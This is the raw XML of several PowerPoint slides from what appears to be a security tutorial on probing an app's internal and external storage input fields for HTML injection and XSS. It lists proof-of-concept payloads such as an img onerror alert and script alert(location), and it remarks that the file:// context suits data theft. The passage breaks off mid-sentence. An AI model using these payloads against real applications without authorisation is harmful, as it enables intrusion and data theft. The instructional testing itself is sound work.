            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>get</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>identifying</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>difference</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>between</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>these</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>two</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>, let us </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>try</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>various</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> inputs to check for XSS in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>both</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>these</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>fields</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>Checking for HTML injection:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>Trying</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>some</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> HTML like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" i="1" dirty="0"/>
              <a:t>&lt;h1&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>will</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>result</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>much</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>bigger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>letters</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>suggesting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> HTML Injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> possible:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>Payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>:</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&lt;h1&gt;hello&lt;/h1&gt;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34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A5F1899-406A-DAAB-8CDD-6A90CE0EEDDF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2202738" y="1241352"/>
            <a:ext cx="4738524" cy="4948813"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1391074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Checking for XSS:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>next</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>step</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> to check if JavaScript </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>executes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>Payloads</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>:</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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> sc=x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>onerror</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alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(1)&gt;</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&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(1)&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>Attempting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>these</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>payloads</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>confirms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> the HTML injection can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>also</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>be</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>execute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> JavaScript:</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7353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7509E0-014B-F060-9EE0-CBA47028662F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2419992" y="1311402"/>
            <a:ext cx="4304016" cy="4702536"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2801696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Confirming</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>Execution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>Context</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>Once </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>we</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> know the application </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>vulnerable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> to XSS, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>we</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> can go </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>ahead</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> and figure out </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>what</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> the JavaScript </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>execution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>context</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>. A quick </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>way</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> to figure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> out </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> the location of the page:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>Payloads</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4A4A4A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4A4A4A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4A4A4A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;alert(location)&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4A4A4A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4A4A4A"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>Attempting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>reveals</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>context</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> for the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>internal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>external</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>storage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>vulnerabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>, in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>both</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> cases </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>it</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> file://, a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>privileged</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>context</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>perfect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>steal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> data:</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5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6B1A9D-DE2D-0A4D-EDA2-9306260D3DAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="1" r="68331" b="779"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1325378" y="1363405"/>
            <a:ext cx="2105797" cy="4826760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8704D8F1-371E-B81A-1AE7-5BF05D552E5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="34157" r="34543" b="779"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3596637" y="1363405"/>
            <a:ext cx="2081350" cy="4826760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68853BEE-08AC-71E3-8424-99EBB5AF08FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="68208" r="612" b="779"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5860866" y="1363405"/>
            <a:ext cx="2073374" cy="4826760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4145763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dirty="0" err="1"/>
              <a:t>From</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>above</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>screenshots</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>we</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> have </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>alerted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> the location of the file and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>we</a:t>
            </a:r>
            <a:r>
